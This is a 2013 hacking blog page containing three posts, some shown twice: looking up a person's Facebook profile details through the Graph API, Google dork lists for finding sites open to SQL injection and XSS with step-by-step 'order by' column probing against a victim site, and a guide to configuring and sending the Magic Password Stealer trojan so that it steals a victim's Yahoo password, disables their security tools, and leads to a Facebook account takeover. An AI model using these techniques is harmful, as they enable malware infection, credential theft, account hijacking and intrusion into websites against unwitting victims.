Introductory Video

Tuesday, 16 July 2013

, ,

Get Any Facebook Profile Details With The Help Of User Name ?

Facebook Profile Details



Hi Guys.Today I tell you how to get any Facebook profile id number name first name last name link user name his gender location  on Facebook.This is Very Simple and intrusting trick which will let you get profile id of any person who got custom username.With the help of user name you can find any Facebook id just in one click.to know this trick you just follow my steps
Lets Start :
1. Go to victim profile id which you want to see details
Eg you want to find my profile id details my
www.Facebook.com/hasaanjutthaxor

2. My Facebook url look like this www.Facebook.com/hasaanjutthaxor

3. Change that URL to graph.Facebook.com/hasaanjutthaxor

4. Then you will get his Facebook id number name first name last name link user name his gender location like shown below.

Note :
you can send me Friend Request On Facebook 
only for study purpose :
 
Enjoy :)
, ,

Get Any Facebook Profile Details With The Help Of User Name ?

Facebook Profile Details



Hi Guys.Today I tell you how to get any Facebook profile id number name first name last name link user name his gender location  on Facebook.This is Very Simple and intrusting trick which will let you get profile id of any person who got custom username.With the help of user name you can find any Facebook id just in one click.to know this trick you just follow my steps
Lets Start :

Monday, 15 July 2013

, , , ,

How To Find A Vulnerable Website For XSS, SQLI, LFI, RFI Using Google Dorks ?

Find A Vulnerable Website Using Google Dorks


Hi Guys.In My previous Post i give you some Google Dorks list.Now Today I tell You How To Find A Vulnerable Website Using Google Dorks.Most of the people search in Google or other search engine to check the vulnerable website and in the end some are successful and some are not. This is also problem for new Hackers who don’t know how to check the vulnerable website.Google is best friend for Hackers.Now We can find the Vulnerable website using Google search. This is known as Google Dorks.
There are lot of dorks to check the website is it vulnerable or not.There are lot of dorks to check the website is it vulnerable or not.
Now Lets Start :


Check website for SQL injection SQLI:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=


For More Click Here

copy one from above list and paste in Google search box,And hit enter like shown below
Eg:

http://www.Google.com/index.php?id=2

Now hit enter:
 

if the page remains in the same page,then it is not vulnerable website.
If the page show any error or show blank page, then it is vulnerable website.


Now let's check further:Remove single quote from url
Then add this "order by x" (without quotes)
replace the x with 0,1,2,....n.(until it show error page).

For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5(error)

Now you can come to one conclusion is that website has 4 columns.
Also it is vulnerable
.

If the above method is not working,then try this:
 

http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5--(error)

If this is also not working,then try this:

http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5--(error)

Check website for Cross site scripting XSS:

inurl:".php?search="

inurl:".php?searchstring="


inurl:search.php?q=


inurl:com_feedpostold/feedpost.php?url=


inurl:/poll/default.asp?catid=

 

inurl:/search_results.php?search=
 
inurl:scrapbook.php?id=
 

inurl:headersearch.php?sid=

How to check Sub domain :

If you want to find vulnerabilities of website . so you should go for sub domain. The best dork for searching subdomain is below 
Site: URL –inurl:www
Like if I want to find the subdomain of Google . so it’s like below and don’t add Http and www with the domain 
Site: google.com –inurl:www
 
 
 Enjoy :)
 
, , , ,

How To Find A Vulnerable Website For XSS, SQLI, LFI, RFI Using Google Dorks ?

Find A Vulnerable Website Using Google Dorks


Hi Guys.In My previous Post i give you some Google Dorks list.Now Today I tell You How To Find A Vulnerable Website Using Google Dorks.Most of the people search in Google or other search engine to check the vulnerable website and in the end some are successful and some are not. This is also problem for new Hackers who don’t know how to check the vulnerable website.Google is best friend for Hackers.Now We can find the Vulnerable website using Google search. This is known as Google Dorks.
There are lot of dorks to check the website is it vulnerable or not.There are lot of dorks to check the website is it vulnerable or not.
Now Lets Start :

Wednesday, 10 July 2013

, , ,

Hack Facebook Account 100% With Yahoo Password Hacker Magic Password Stealer Trojan.Exe And How To Use Magic Password Stealer

Magic Password Stealer



Hi Guys.Today i give you amazing and useful hacking tool.His name is Magic Password Stealer.First i tell you What is magic password stealer.MPS is a virus that creates a software that hacks the yahoo password. After you create the software, you have to send it to the victim's computer at any condition. After victim opens the file, MPS starts its work. Then when the victim re-login in his yahoo, The password and other information is sent to your email as offline message.Be very careful with this software.. it is a trojan.. and if u want to use this u have to disable your antivirus and then open it and set it properly and then it will create a file and that file u should not open.. u have to send it to your friend and the password will be sent to you when he opens it.. and if u do something wrong your own password will be sent to you.
Follow my Steps:

How to Use Magic Password Stealer

1. Download Magic Password Stealer From Here

2. Extract this file and open MPS Where you extract,Then a new window pop up like shown below.



3.  Here, In the '1' Part, You have to tick on those tick boxes according to your need. Every text box is defined below :

  1. Send NetWork IP → Sends the Network IP of the victim's computer
  2. Send Computer Name → It sends the Computer name of victim
  3. Disable Taskmanager → It disable the Task Manager (Alt + Ctrl + Del to see task manager)
  4. Disable Sys Restore → It disable the facility of system restore of victim
  5. Disable CompMgmt → It disable the computer management of the victim's computer
  6. Disable Y! save pass → It removes the saved yahoo password of the victim's computer
  7. Delete Mess Archive → It deletes the full message archive of victim's yahoo ID
  8. Send OS name → It sends the name of operating system that victim has been using
  9. Auto startup → It starts the program automatically
  10. Send win username → It sends the username of the window
  11. Disable regedit → It disables the computer registry editor
  12. Disable MsConfig → It disables MS Config
  13. Send Y! Mess Pass → Sends the yahoo password of the victim
  14. Disable GPEdit → It disables Group Policy Editor
  15. Encode Pass → It encodes the password of the victim
  16. Melt after Install → It automatically delete itself after installation
Now tick on the text boxes according to your requirement

4. After This In Part '2' Tick On The Fake error Message if you want to generate the fake error message to victim.

5. In '3' Part Give your yahoo id  @yahoo.com and @ymail.com 
where you want to get the victim's password.

6. In '4' tick on binder if you want to use this.if you don't want use don't Tick on binder.

7. In '5' part Choose the Icon for your password stealer that see the victim when you send this file.

8.  In '6' Part Give name your fake file.You can rename this file after create.

9. Now After All Steps Click On Create Mps File.

10.
you have to send it to the victim's computer at any condition. After victim opens the file, MPS starts its work. Then when the victim re-login in his yahoo, The password and other information is sent to your email as offline message.

After get victim password Now you open facebook click on forget password then enter victim yahoo email address Click on Search After This you choos send me email on victim yahoo email Then facebook send email on Victim yahoo id you open that yahoo id and and go to inbox and click on facebook massage and click on reset password link now your id hacked 
:)

Note :

MPS is a torjan virus. That may effect your and victim's computer.We Are Not responsible for any damaged occurred!!

Enjoy And Stay With Me